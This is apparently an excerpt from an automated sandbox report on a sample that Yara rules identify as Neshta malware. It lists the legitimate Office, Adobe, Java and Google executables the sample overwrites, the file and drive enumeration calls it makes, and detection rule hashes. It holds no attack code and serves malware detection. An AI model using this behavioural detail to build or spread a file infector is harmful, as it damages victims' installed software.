Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
Source: Yara match, File source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
Source: Yara match, File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
Source: Yara match, File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Infects executable files (exe, dll, sys, html)Show sources
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00405080 FindFirstFileA,FindNextFileA,FindClose,0_2_00405080
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00405634 FindFirstFileA,FindNextFileA,FindClose,0_2_00405634
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00404F6C FindFirstFileA,FindClose,0_2_00404F6C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0C4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0CC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,0_2_0040F13F
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,0_2_004056A7
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EA04 FindFirstFileA,FindClose,0_2_0040EA04
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EB16 FindFirstFileA,FindClose,0_2_0040EB16
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,0_2_0040EB18
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,0_2_00406D40
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                  Source: Z68mMCAxFZ.exe, 00000000.00000003.874643754.0000000002300000.00000004.00000001.sdmpBinary or memory string: _WinAPI_RegisterRawInputDevices.au3

                  System Summary:

                  Potential malicious icon found
                  Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
                  Source: Z68mMCAxFZ.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                  Source: Z68mMCAxFZ.exe, type: SAMPLE | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED | Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
